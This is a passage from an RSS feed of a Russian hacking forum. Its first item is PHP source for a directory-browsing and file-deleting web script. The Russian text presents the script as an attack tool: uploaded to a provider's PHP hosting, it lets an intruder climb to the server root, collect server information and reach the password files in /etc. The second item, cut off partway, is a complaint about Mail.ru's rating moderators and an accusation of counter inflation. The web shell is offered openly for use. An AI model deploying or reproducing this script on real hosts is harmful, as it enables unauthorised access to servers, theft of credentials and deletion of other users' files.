						&lt;p&gt;return $IMG=&amp;quot;&amp;lt;IMG SRC=&#039;icons/&amp;quot;.$file.&amp;quot;.gif&#039;&amp;gt;&amp;quot;; &lt;br /&gt;} &lt;/p&gt;
						&lt;p&gt;class MyFile { //объявляем какие данные будут получены &lt;br /&gt;var $name; &lt;br /&gt;var $path; &lt;br /&gt;var $type; &lt;br /&gt;var $ext; &lt;br /&gt;var $stype; &lt;br /&gt;var $sfile; &lt;br /&gt;var $size; &lt;br /&gt;var $file; &lt;br /&gt;var $atime; &lt;br /&gt;var $ctime; &lt;br /&gt;var $mtime; &lt;br /&gt;var $group; &lt;br /&gt;var $inode; &lt;br /&gt;var $owner; &lt;br /&gt;var $perms; &lt;/p&gt;
						&lt;p&gt;function set( $filename, $path ) &lt;br /&gt;{ &lt;br /&gt;GLOBAL $cd; //объявляем функции перехода по каталогам &lt;/p&gt;
						&lt;p&gt;$this-&amp;gt;name = $filename; &lt;br /&gt;$this-&amp;gt;path = $path; &lt;br /&gt;$this-&amp;gt;file = $this-&amp;gt;path.&amp;quot;/&amp;quot;.$this-&amp;gt;name; &lt;/p&gt;
						&lt;p&gt;$this-&amp;gt;type = filetype( $this-&amp;gt;file ); &lt;br /&gt;$this-&amp;gt;size = filesize( $this-&amp;gt;file ); &lt;br /&gt;$this-&amp;gt;atime = fileatime( $this-&amp;gt;file ); &lt;br /&gt;$this-&amp;gt;ctime = filectime( $this-&amp;gt;file ); &lt;br /&gt;$this-&amp;gt;mtime = filemtime( $this-&amp;gt;file ); &lt;br /&gt;$this-&amp;gt;group = filegroup( $this-&amp;gt;file ); &lt;br /&gt;$this-&amp;gt;inode = fileinode( $this-&amp;gt;file ); &lt;br /&gt;$this-&amp;gt;owner = fileowner( $this-&amp;gt;file ); &lt;br /&gt;$this-&amp;gt;perms = fileperms( $this-&amp;gt;file ); &lt;/p&gt;
						&lt;p&gt;switch( $this-&amp;gt;type ) &lt;br /&gt;{ &lt;br /&gt;case &amp;quot;link&amp;quot;: &lt;br /&gt;$this-&amp;gt;sfile = readlink( $this-&amp;gt;file ); &lt;br /&gt;$this-&amp;gt;stype = filetype( $this-&amp;gt;sfile ); &lt;br /&gt;$this-&amp;gt;ext = &amp;quot;link&amp;quot;; &lt;br /&gt;break; &lt;br /&gt;case &amp;quot;file&amp;quot;: &lt;br /&gt;$list = explode( &amp;quot;.&amp;quot;, $this-&amp;gt;name ); &lt;br /&gt;$nb = sizeof( $list ); &lt;br /&gt;if( $nb &amp;gt; 0 ) &lt;br /&gt;$this-&amp;gt;stype = $list[$nb-1]; &lt;br /&gt;else &lt;br /&gt;$this-&amp;gt;stype = &amp;quot;???&amp;quot;; &lt;/p&gt;
						&lt;p&gt;$this-&amp;gt;ext = $this-&amp;gt;stype; &lt;/p&gt;
						&lt;p&gt;switch( $this-&amp;gt;stype ) &lt;br /&gt;{ &lt;br /&gt;case &amp;quot;gif&amp;quot;: &lt;br /&gt;case &amp;quot;GIF&amp;quot;: &lt;br /&gt;case &amp;quot;jpg&amp;quot;: &lt;br /&gt;case &amp;quot;JPG&amp;quot;: &lt;br /&gt;if( isset( $cd ) ) &lt;br /&gt;$pwd = $cd.&amp;quot;/&amp;quot;; &lt;br /&gt;else &lt;br /&gt;$pwd = &amp;quot;&amp;quot;; &lt;/p&gt;
						&lt;p&gt;$this-&amp;gt;sfile = &amp;quot;&amp;lt;IMG SRC=&#039;&amp;quot;.$this-&amp;gt;file.&amp;quot;&#039;&amp;gt;&amp;quot;; &lt;br /&gt;break; &lt;br /&gt;default: &lt;br /&gt;$this-&amp;gt;sfile = $this-&amp;gt;stype; &lt;br /&gt;break; &lt;br /&gt;} &lt;br /&gt;break;&lt;br /&gt;default: &lt;br /&gt;$this-&amp;gt;stype = &amp;quot;&amp;quot;; &lt;br /&gt;$this-&amp;gt;sfile = &amp;quot;&amp;quot;; &lt;br /&gt;$this-&amp;gt;ext = $this-&amp;gt;type; &lt;br /&gt;break; &lt;br /&gt;} &lt;br /&gt;} &lt;/p&gt;
						&lt;p&gt;function formatSize() &lt;br /&gt;{ &lt;br /&gt;return number_format( $this-&amp;gt;size, 0, &amp;quot;.&amp;quot;, &amp;quot; &amp;quot;); &lt;br /&gt;} &lt;br /&gt;} &lt;/p&gt;
						&lt;p&gt;function genUrl( $ref, $args, $key = &amp;quot;&amp;quot;, $val = &amp;quot;&amp;quot; )&lt;/p&gt;
						&lt;p&gt;{ &lt;br /&gt;$valist = &amp;quot;&amp;quot;; &lt;/p&gt;
						&lt;p&gt;reset( $args ); &lt;/p&gt;
						&lt;p&gt;if( $key != &amp;quot;&amp;quot; ) &lt;br /&gt;$args[ &amp;quot;$key&amp;quot; ] = $val; &lt;/p&gt;
						&lt;p&gt;if( !is_array( $args ) ) &lt;br /&gt;return $ref; &lt;/p&gt;
						&lt;p&gt;while( list( $key, $val ) = each( $args ) ) &lt;br /&gt;{ &lt;br /&gt;if( $val == &amp;quot;&amp;quot; ) &lt;br /&gt;continue; &lt;/p&gt;
						&lt;p&gt;if( $valist == &amp;quot;&amp;quot; ) &lt;br /&gt;$valist .= &amp;quot;?&amp;quot;; &lt;br /&gt;else &lt;br /&gt;$valist .= &amp;quot;&amp;amp;&amp;quot;; &lt;/p&gt;
						&lt;p&gt;$valist .= $key.&amp;quot;=&amp;quot;.$val; &lt;br /&gt;} &lt;br /&gt;return $ref.$valist; &lt;br /&gt;} &lt;/p&gt;
						&lt;p&gt;function updir( $path ) &lt;br /&gt;{ &lt;br /&gt;$last = strrchr( $path, &amp;quot;/&amp;quot; ); &lt;br /&gt;$n1 = strlen( $last ); &lt;br /&gt;$n2 = strlen( $path ); &lt;br /&gt;return substr( $path, 0, $n2-$n1 ); &lt;br /&gt;} &lt;/p&gt;
						&lt;p&gt;$ref = &amp;quot;dir.php&amp;quot;; &lt;/p&gt;
						&lt;p&gt;if( isset( $cd ) ) &lt;br /&gt;{ &lt;br /&gt;$path = $cd; &lt;br /&gt;//$lcd = &amp;quot;?cd=$cd&#039;&amp;quot;; &lt;br /&gt;$args[ &amp;quot;cd&amp;quot; ] = $cd; &lt;br /&gt;} &lt;br /&gt;else &lt;br /&gt;{ &lt;br /&gt;$path = &amp;quot;.&amp;quot;; &lt;br /&gt;//$lcd = &amp;quot;&amp;quot;; &lt;br /&gt;$args[ &amp;quot;cd&amp;quot; ] = &amp;quot;&amp;quot;; &lt;br /&gt;} &lt;/p&gt;
						&lt;p&gt;if( isset( $nb ) ) &lt;br /&gt;{ &lt;br /&gt;for( $i = 0; $i &amp;lt; $nb; $i++ ) &lt;br /&gt;{ &lt;br /&gt;$var = &amp;quot;id_$i&amp;quot;; &lt;br /&gt;if( isset( $$var ) )&lt;br /&gt;{ &lt;br /&gt;$file = $path.&amp;quot;/&amp;quot;.$$var; &lt;br /&gt;if( is_file( $file ) || is_link( $file ) ) &lt;br /&gt;{ &lt;br /&gt;if( unlink( $file ) ) &lt;br /&gt;echo &amp;quot;&amp;lt;BR&amp;gt;&amp;lt;b&amp;gt;$file&amp;lt;/b&amp;gt; успешно удалён\n&amp;quot;; //сообщение об успешном удалении файла &lt;br /&gt;else &lt;br /&gt;echo &amp;quot;&amp;lt;BR&amp;gt;Не могу удалить выставите права доступа &amp;lt;b&amp;gt;$file&amp;lt;/b&amp;gt;\n&amp;quot;; //сообщение о невозможности удалить файл который доступен только для чтения &lt;br /&gt;} &lt;br /&gt;elseif( is_dir( $file ) ) &lt;br /&gt;{ &lt;br /&gt;if( rmdir( $file ) ) &lt;br /&gt;echo &amp;quot;&amp;lt;BR&amp;gt;&amp;lt;b&amp;gt;$file&amp;lt;/b&amp;gt; успешно удалён\n&amp;quot;; //сообщение об успешном удалении &lt;br /&gt;else &lt;br /&gt;echo &amp;quot;&amp;lt;BR&amp;gt;файл недоступен для удаления&amp;lt;b&amp;gt;$file&amp;lt;/b&amp;gt;\n&amp;quot;; //сообщение о невозможности удалить файл &lt;br /&gt;} &lt;br /&gt;} &lt;br /&gt;} &lt;br /&gt;} &lt;/p&gt;
						&lt;p&gt;$step = 100; &lt;/p&gt;
						&lt;p&gt;if( !isset( $sort ) ) &lt;br /&gt;$sort = &amp;quot;name&amp;quot;; &lt;br /&gt;else &lt;br /&gt;$args[ &amp;quot;sort&amp;quot; ] = $sort; &lt;/p&gt;
						&lt;p&gt;if( !isset( $from ) ) &lt;br /&gt;$from = 0; &lt;br /&gt;else &lt;br /&gt;$args[ &amp;quot;from&amp;quot; ] = $from; &lt;/p&gt;
						&lt;p&gt;if( !isset( $to ) ) &lt;br /&gt;$to = $from + $step; &lt;/p&gt;
						&lt;p&gt;$d = dir($path); &lt;br /&gt;echo &amp;quot;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;br&amp;gt;&amp;lt;a href=$ref &amp;gt;Вернуться в начало&amp;lt;/a&amp;gt;\n&amp;quot;; //ссылка на возврат в домашнею директорию скрипта &lt;br /&gt;$updir = updir($d-&amp;gt;path); &lt;br /&gt;if( $updir != &amp;quot;.&amp;quot; ) &lt;br /&gt;echo &amp;quot;&amp;lt;br&amp;gt;Подняться на директорию вверх; &amp;lt;a href=$ref?cd=$updir&amp;gt;$updir&amp;lt;/a&amp;gt;\n&amp;quot;; //ссылка на директорию вверх &lt;br /&gt;echo &amp;quot;&amp;lt;br&amp;gt;Открыть директорию: &amp;lt;a href=$ref?cd=&amp;quot;.$d-&amp;gt;path.&amp;quot;/..&amp;gt;..&amp;lt;/a&amp;gt;\n&amp;quot;; //обновление текущей директории &lt;br /&gt;echo &amp;quot;&amp;lt;br&amp;gt;Текущая директория: &amp;lt;b&amp;gt;&amp;quot;.$d-&amp;gt;path.&amp;quot;&amp;lt;/b&amp;gt;\n&amp;quot;; //показываем путь до директории и файлов, которые в ней находятся &lt;/p&gt;
						&lt;p&gt;$n = 0; &lt;br /&gt;while( $entry=$d-&amp;gt;read() ) &lt;br /&gt;{ &lt;br /&gt;$lFiles[ $n ] = new MyFile; &lt;br /&gt;$lFiles[ $n ]-&amp;gt;set( $entry, $path ); &lt;br /&gt;$n++; &lt;br /&gt;} &lt;/p&gt;
						&lt;p&gt;$d-&amp;gt;close(); //создаём HTML форму управления функциями &lt;br /&gt;echo &amp;quot;&amp;lt;FORM NAME=&#039;del&#039; METHOD=&#039;post&#039; ACTION=&#039;&amp;quot;.genUrl( $ref, $args ).&amp;quot;&#039;&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TABLE BORDER=1&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TR&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TH&amp;gt;D&amp;lt;/TH&amp;gt;\n&amp;quot;; &lt;br /&gt;//echo &amp;quot;&amp;lt;TH&amp;gt;&amp;lt;a href=&#039;&amp;quot;.genUrl( $ref, $args, &amp;quot;sort&amp;quot;, &amp;quot;type&amp;quot; ).&amp;quot;&#039;&amp;gt;Type&amp;lt;/a&amp;gt;&amp;lt;/TH&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TH&amp;gt;&amp;lt;a href=&#039;&amp;quot;.genUrl( $ref, $args, &amp;quot;sort&amp;quot;, &amp;quot;name&amp;quot; ).&amp;quot;&#039;&amp;gt;Имя&amp;lt;/a&amp;gt;&amp;lt;/TH&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TH&amp;gt;&amp;lt;a href=&#039;&amp;quot;.genUrl( $ref, $args, &amp;quot;sort&amp;quot;, &amp;quot;size&amp;quot; ).&amp;quot;&#039;&amp;gt;Размер&amp;lt;/a&amp;gt;&amp;lt;/TH&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TH&amp;gt;&amp;lt;a href=&#039;&amp;quot;.genUrl( $ref, $args, &amp;quot;sort&amp;quot;, &amp;quot;ext&amp;quot; ).&amp;quot;&#039;&amp;gt;Класс&amp;lt;/a&amp;gt;&amp;lt;/TH&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TH&amp;gt;&amp;lt;a href=&#039;&amp;quot;.genUrl( $ref, $args, &amp;quot;sort&amp;quot;, &amp;quot;atime&amp;quot; ).&amp;quot;&#039;&amp;gt;В системе&amp;lt;/a&amp;gt;&amp;lt;/TH&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TH&amp;gt;&amp;lt;a href=&#039;&amp;quot;.genUrl( $ref, $args, &amp;quot;sort&amp;quot;, &amp;quot;ctime&amp;quot; ).&amp;quot;&#039;&amp;gt;Создан&amp;lt;/a&amp;gt;&amp;lt;/TH&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TH&amp;gt;&amp;lt;a href=&#039;&amp;quot;.genUrl( $ref, $args, &amp;quot;sort&amp;quot;, &amp;quot;mtime&amp;quot; ).&amp;quot;&#039;&amp;gt;Изменён&amp;lt;/a&amp;gt;&amp;lt;/TH&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TH&amp;gt;&amp;lt;a href=&#039;&amp;quot;.genUrl( $ref, $args, &amp;quot;sort&amp;quot;, &amp;quot;perms&amp;quot; ).&amp;quot;&#039;&amp;gt;Размер&amp;lt;/a&amp;gt;&amp;lt;/TH&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TH&amp;gt;&amp;lt;a href=&#039;&amp;quot;.genUrl( $ref, $args, &amp;quot;sort&amp;quot;, &amp;quot;group&amp;quot; ).&amp;quot;&#039;&amp;gt;Группа&amp;lt;/a&amp;gt;&amp;lt;/TH&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TH&amp;gt;&amp;lt;a href=&#039;&amp;quot;.genUrl( $ref, $args, &amp;quot;sort&amp;quot;, &amp;quot;owner&amp;quot; ).&amp;quot;&#039;&amp;gt;ow&amp;lt;/a&amp;gt;&amp;lt;/TH&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TH&amp;gt;&amp;lt;a href=&#039;&amp;quot;.genUrl( $ref, $args, &amp;quot;sort&amp;quot;, &amp;quot;inode&amp;quot; ).&amp;quot;&#039;&amp;gt;in&amp;lt;/a&amp;gt;&amp;lt;/TH&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TH&amp;gt;Показ&amp;lt;/TH&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;/TR&amp;gt;\n&amp;quot;; &lt;/p&gt;
						&lt;p&gt;@usort( $lFiles, cmp ); &lt;/p&gt;
						&lt;p&gt;for( $i = 0; $i &amp;lt; $n; $i++ ) &lt;br /&gt;{ &lt;br /&gt;if( ( $i &amp;lt; $from ) || ( $i &amp;gt;= $to ) ) &lt;br /&gt;continue; &lt;/p&gt;
						&lt;p&gt;$k = $i; &lt;br /&gt;echo &amp;quot;&amp;lt;TR&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TD&amp;gt;&amp;lt;INPUT TYPE=&#039;checkbox&#039; NAME=&#039;id_$k&#039; VALUE=&#039;&amp;quot;. &lt;br /&gt;$lFiles[ $k ]-&amp;gt;name &lt;br /&gt;.&amp;quot;&#039;&amp;gt;&amp;lt;/TD&amp;gt;\n&amp;quot;; &lt;/p&gt;
						&lt;p&gt;$IMG=getIcons( $lFiles[ $k ]-&amp;gt;ext ); &lt;/p&gt;
						&lt;p&gt;$dform = &amp;quot;M j y H:i&amp;quot;; &lt;br /&gt;// echo &amp;quot;&amp;lt;TD ALIGN=CENTER &amp;gt;&amp;quot;.$lFiles[ $k ]-&amp;gt;type.&amp;quot;&amp;lt;/TD&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TD&amp;gt;$IMG&amp;quot;.$lFiles[ $k ]-&amp;gt;name.&amp;quot;&amp;lt;/TD&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TD ALIGN=RIGHT &amp;gt;&amp;quot;.$lFiles[ $k ]-&amp;gt;formatSize().&amp;quot;&amp;lt;/TD&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TD&amp;gt;&amp;quot;.$lFiles[ $k ]-&amp;gt;ext .&amp;quot;&amp;lt;/TD&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TD&amp;gt;&amp;quot;.date( $dform, $lFiles[ $k ]-&amp;gt;atime ).&amp;quot;&amp;lt;/TD&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TD&amp;gt;&amp;quot;.date( $dform, $lFiles[ $k ]-&amp;gt;ctime ).&amp;quot;&amp;lt;/TD&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TD&amp;gt;&amp;quot;.date( $dform, $lFiles[ $k ]-&amp;gt;mtime ).&amp;quot;&amp;lt;/TD&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TD&amp;gt;&amp;quot;.$lFiles[ $k ]-&amp;gt;perms.&amp;quot;&amp;lt;/TD&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TD&amp;gt;&amp;quot;.$lFiles[ $k ]-&amp;gt;group.&amp;quot;&amp;lt;/TD&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TD&amp;gt;&amp;quot;.$lFiles[ $k ]-&amp;gt;owner.&amp;quot;&amp;lt;/TD&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;TD&amp;gt;&amp;quot;.$lFiles[ $k ]-&amp;gt;inode.&amp;quot;&amp;lt;/TD&amp;gt;\n&amp;quot;; &lt;/p&gt;
						&lt;p&gt;switch( $lFiles[ $k ]-&amp;gt;type ) &lt;br /&gt;{ &lt;br /&gt;case &amp;quot;link&amp;quot;: &lt;br /&gt;if( $lFiles[ $k ]-&amp;gt;stype == &amp;quot;dir&amp;quot; ) &lt;br /&gt;{ &lt;br /&gt;$tcd = $lFiles[ $k ]-&amp;gt;path.&amp;quot;/&amp;quot;.$lFiles[ $k ]-&amp;gt;name; &lt;br /&gt;echo &amp;quot;&amp;lt;TD&amp;gt;&amp;lt;a href=&#039;&amp;quot;. &lt;br /&gt;genUrl( $ref, $args, &amp;quot;cd&amp;quot;, $tcd ).&amp;quot;&#039;&amp;gt;&amp;quot;. &lt;br /&gt;$lFiles[ $k ]-&amp;gt;sfile.&amp;quot;&amp;lt;/a&amp;gt;&amp;lt;/TD&amp;gt;\n&amp;quot;; &lt;br /&gt;} &lt;br /&gt;else &lt;br /&gt;echo &amp;quot;&amp;lt;TD&amp;gt;&amp;quot;.$lFiles[ $k ]-&amp;gt;sfile.&amp;quot;&amp;lt;/TD&amp;gt;\n&amp;quot;; &lt;br /&gt;break; &lt;br /&gt;case &amp;quot;dir&amp;quot;:&lt;br /&gt;$tcd = $lFiles[ $k ]-&amp;gt;path.&amp;quot;/&amp;quot;.$lFiles[ $k ]-&amp;gt;name; &lt;br /&gt;echo &amp;quot;&amp;lt;TD&amp;gt;&amp;lt;a href=&#039;&amp;quot;. &lt;br /&gt;genUrl( $ref, $args, &amp;quot;cd&amp;quot;, $tcd ).&amp;quot;&#039;&amp;gt;&amp;quot;. &lt;br /&gt;$lFiles[ $k ]-&amp;gt;name.&amp;quot;&amp;lt;/a&amp;gt;&amp;lt;/TD&amp;gt;\n&amp;quot;; &lt;br /&gt;break; &lt;br /&gt;case &amp;quot;file&amp;quot;: &lt;br /&gt;echo &amp;quot;&amp;lt;TD&amp;gt;&amp;quot;.$lFiles[ $k ]-&amp;gt;sfile.&amp;quot;&amp;lt;/TD&amp;gt;\n&amp;quot;; &lt;br /&gt;break; &lt;br /&gt;default: &lt;br /&gt;echo &amp;quot;&amp;lt;TD&amp;gt;NO&amp;lt;/TD&amp;gt;\n&amp;quot;; &lt;br /&gt;break; &lt;br /&gt;} &lt;br /&gt;echo &amp;quot;&amp;lt;/TR&amp;gt;\n&amp;quot;; &lt;br /&gt;} &lt;/p&gt;
						&lt;p&gt;echo &amp;quot;&amp;lt;/TABLE&amp;gt;\n&amp;quot;; &lt;/p&gt;
						&lt;p&gt;$from = $from - $step; &lt;br /&gt;if( isset( $cd ) ) &lt;br /&gt;{ &lt;br /&gt;echo &amp;quot;&amp;lt;INPUT TYPE=&#039;hidden&#039; NAME=&#039;cd&#039; VALUE=&#039;$cd&#039;&amp;gt;\n&amp;quot;; &lt;br /&gt;} &lt;br /&gt;echo &amp;quot;&amp;lt;INPUT TYPE=&#039;hidden&#039; NAME=&#039;nb&#039; VALUE=&#039;$n&#039;&amp;gt;\n&amp;quot;; &lt;/p&gt;
						&lt;p&gt;//echo &amp;quot;&amp;lt;br&amp;gt;from=$from;to=$to;n=$n\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;br&amp;gt;\n&amp;quot;; &lt;br /&gt;if( $from &amp;gt;= 0 ) &lt;br /&gt;{ &lt;br /&gt;echo &amp;quot;&amp;lt;a href=&#039;&amp;quot;. &lt;br /&gt;genUrl( $ref, $args, &amp;quot;from&amp;quot;, $from ).&amp;quot;&#039; &amp;gt;Предыдущий&amp;lt;/a&amp;gt;/\n&amp;quot;; &lt;br /&gt;} &lt;br /&gt;if( $to &amp;lt;= $n ) &lt;br /&gt;{ &lt;br /&gt;echo &amp;quot;&amp;lt;a href=&#039;&amp;quot;. &lt;br /&gt;genUrl( $ref, $args, &amp;quot;from&amp;quot;, $to ).&amp;quot;&#039; &amp;gt;Далее&amp;lt;/a&amp;gt; \n&amp;quot;; &lt;br /&gt;} &lt;br /&gt;echo &amp;quot;&amp;lt;br&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;INPUT TYPE=&#039;submit&#039; VALUE=&#039;Del&#039;&amp;gt;\n&amp;quot;; &lt;br /&gt;echo &amp;quot;&amp;lt;/FORM&amp;gt;\n&amp;quot;; &lt;br /&gt;?&amp;gt; //говорим что PHP скрипт кончился&lt;/p&gt;
						&lt;p&gt;Вот реализация скрипта, который позволяет вам получить доступ в каталоги провайдера, содержащиеся у него на винчестере. Потенциальная опасность применения данного скрипта в том, что злоумышленник получает практически всю информацию о сервере, также злоумышленник получает доступ к папки etc, где хранятся пароли. При проверке работоспособности скрипта и проверке на уязвимости было выявлено, что все сервера, на которых разрешён запуск PHP оказались подвержены данной атаке. Скрипт помещяется на сервер провайдера, где вам разрешен запуск PHP скриптов, в директорию домашней странички. По умолчанию скрипт просматривает все находящиеся файлы в той директории, куда он был загружен для того, чтобы попасть в корневой каталог сервера жмите на ссылку &amp;quot;Подняться на каталог выше&amp;quot; до тех пор, пока вы не увидите корневой каталог сервера. При выходе из вашей директории скрипт возможно сообщит вам о невозможности выйти из вашего каталога, это сообщение сервера игнорируйте и жмите на ссылку &amp;quot;Подняться на каталог вверх&amp;quot;, скрипт передаст данные серверу о том, что каталоги которые вы пытаетесь просмотреть являются вашими и вас пропустят.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 13:55:23 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=31#p31</guid>
		</item>
		<item>
			<title>Видит Бог, я этого не хотел...</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=30#p30</link>
			<description>&lt;p&gt;Накрутка счетчика - мошенничество, целью которого является &lt;br /&gt;завладение денежными средствами рекламодателя посредством создания &lt;br /&gt;иллюзии популярности интернет-ресурса и основанное на доверии &lt;br /&gt;рекламодателя к рейтинговым системам.&lt;br /&gt;Почему я это публикую&lt;br /&gt;26 апреля 2002 года я обнаружил, что на Mail.ru вместо нормальной &lt;br /&gt;статистики ресурса, над которым я работаю, появилось сообщение &lt;br /&gt;&amp;quot;Ресурс не участвует в рейтинге. Причина: накрутка счетчика&amp;quot; &lt;br /&gt;(выделено мной). Естественно, я сразу же посылаю письмо по &lt;br /&gt;указанному адресу с просьбой дать объяснения, жду час, другой, сутки &lt;br /&gt;- нет ответа. Посылаю письмо с запросом квитка, снова терпеливо жду &lt;br /&gt;несколько часов и ни квитка, ни ответа. Тогда нахожу адреса других &lt;br /&gt;служб Mail.ru и повторяю письмо с просьбой передать его &lt;br /&gt;&amp;quot;рейтингистам&amp;quot;. В письме я просил объясниться и представить мне &lt;br /&gt;доказательства мошенничества, поскольку обвинение лица в &lt;br /&gt;мошенничестве без достаточных на то оснований в средстве массовой &lt;br /&gt;информации, может быть расценено лицом, как распространение &lt;br /&gt;средством массовой информации ложных сведений (измышлений) о лице с &lt;br /&gt;целью нанесения лицу публичного оскорбления. &lt;br /&gt;Наконец-то был получен первый ответ. Но, что ни контакт с Mail.ru, &lt;br /&gt;то либо оскорбление, либо на грани этого. Задержка ответа более чем &lt;br /&gt;на сутки вкупе с отсутствием квитка может означать, что письмо, не &lt;br /&gt;прочитав, просто выбросили в корзину. Да и сам ответ оставляет &lt;br /&gt;желать лучшего, поскольку мне ставили в вину то, что в момент &lt;br /&gt;регистрации ресурса на Mail.ru (в то время еще List.ru) персонал &lt;br /&gt;Mail.ru мне не предложил код java-счетчика. В ответе я довел до &lt;br /&gt;сведения модератора свою трактовку кривой посещаемости и попросил &lt;br /&gt;выслать мне код необходимого java-счетчика. &lt;br /&gt;Второй ответ был не менее неубедительный - &amp;quot;я так считаю&amp;quot; и &lt;br /&gt;&amp;quot;поставьте java-счетчик&amp;quot;. Только после нескольких просьб мне выслали &lt;br /&gt;код счетчика, но так и не восстановили статус ресурса. Модераторы &lt;br /&gt;Mail.ru проявляли странное упорство. Тогда я звоню по указанному в &lt;br /&gt;одном из писем телефону и мне наглым тоном заявляют: &amp;quot;А что Вы &lt;br /&gt;хотите? Счетчик бесплатный, имеем полное право&amp;quot;. &lt;br /&gt;И тогда я понял, что это не глупость и не ошибка, а вымогательство &lt;br /&gt;денег из персонала ресурса с высоким рейтингом (мол, рейтинг &lt;br /&gt;высокий, а счетчик бесплатный, но если заплатите, то проблем не &lt;br /&gt;будет). Слово, объясняющее корыстный мотив совершенного действия, &lt;br /&gt;было сказано. А слово - не воробей, вылетело - не поймаешь. И &lt;br /&gt;некоторые уважаемые мной люди успели увидеть публичное обвинение &lt;br /&gt;меня в мошенничестве и высказали мне свое недоумение по этому &lt;br /&gt;поводу. И я был вынужден давать им объяснения и показывать переписку &lt;br /&gt;с Mail.ru. &lt;br /&gt;И тогда я решил наказать Mail.ru. &amp;quot;Ломать&amp;quot; их - не ново, да и &lt;br /&gt;мальчишество это с уголовщиной. Обращаться в Суд - долгая песня, да &lt;br /&gt;и страницу они уже удалили. И не только ее, но и регистрационую &lt;br /&gt;запись ресурса, усугубив нанесенное мне оскорбление небрежением к &lt;br /&gt;моей воле. Я не кровожаден, мне пока достаточно апелляции к &lt;br /&gt;общественному мнению, чтобы попытаться в корне пресечь &amp;quot;бесплатное&amp;quot; &lt;br /&gt;оскорбление людей бескорыстно любящими деньги &amp;quot;рейтингистами&amp;quot; из &lt;br /&gt;Mail.ru, и сделать это так, чтобы впредь и другим неповадно было. &lt;br /&gt;Видит Бог, до этого момента я даже не задумывался о публикации моих &lt;br /&gt;изысков о &amp;quot;накрутке&amp;quot; счетчиков. &lt;br /&gt;Как это было на самом деле&lt;br /&gt;В апреле 2001 года я пришел в Проект. Мне поставили задачу вывести &lt;br /&gt;Проект на верхние строки рейтингов (желательно первое место и с &lt;br /&gt;большим отрывом), т.е. необходимо было добиться посещаемости порядка &lt;br /&gt;10-15 тысяч человек в сутки (50-100 тысяч показов страниц). Я считаю &lt;br /&gt;идею Проекта очень перспективной, жизнеспособной и полностью &lt;br /&gt;соответствующей поставленной задаче. Хорошей идее нужна лишь &lt;br /&gt;правильная реализация, как алмазу нужна огранка, чтобы он засверкал &lt;br /&gt;всеми цветами радуги. Дальнейшее поведение переработанного мной &lt;br /&gt;Проекта подтвердило мои предположения. &lt;br /&gt;В июне было принято решение о переводе проекта в стадию &lt;br /&gt;реорганизации с продолжением финансирования минимально необходимых &lt;br /&gt;для реорганизации работ и персонала. И я приступил к &amp;quot;огранке&amp;quot;. Для &lt;br /&gt;начала я изучил требования всех основных &amp;quot;поисковиков&amp;quot; и &lt;br /&gt;реорганизовал в соответствии с их требованиями представление &lt;br /&gt;информации, добившись почти максимальной релевантности для ключевых &lt;br /&gt;слов на страницах. Однако остались &amp;quot;хвосты&amp;quot; от первых разработчиков. &lt;br /&gt;Например, в Expires было указано, что страницы не будут меняться две &lt;br /&gt;тысячи лет. &lt;br /&gt;Несмотря на то, что Internet в целом - инерционная система, резкие &lt;br /&gt;скачки посещаемости отдельных ресурсов вполне допустимы и &lt;br /&gt;свидетельствуют о качественных изменениях (переходных процессах) в &lt;br /&gt;поведении. С 10 октября 2001 года и по 5 марта 2002 года Проект &lt;br /&gt;непрерывно набирал посещаемость до более чем 500 человек в сутки и &lt;br /&gt;только благодаря одному Yandex.ru. Более значительному росту &lt;br /&gt;посещаемости мешал низкий индекс цитирования. Остальные же &lt;br /&gt;&amp;quot;поисковики&amp;quot; просто взирали на &amp;quot;памятник&amp;quot;, воздвигнутый из Expires &lt;br /&gt;первыми разработчиками. &lt;br /&gt;И вот ночью 5 марта, через год (слава Богу не через 2000 лет) после &lt;br /&gt;регистрации ресурса на Rambler.ru, их робот наконец-то &amp;quot;проснулся&amp;quot;, &lt;br /&gt;перечитал ресурс и сразу же дал резкий скачок посещаемости. Эффект &lt;br /&gt;был сравнимый с эффектом от регистрации ранее &amp;quot;раскрученного&amp;quot; 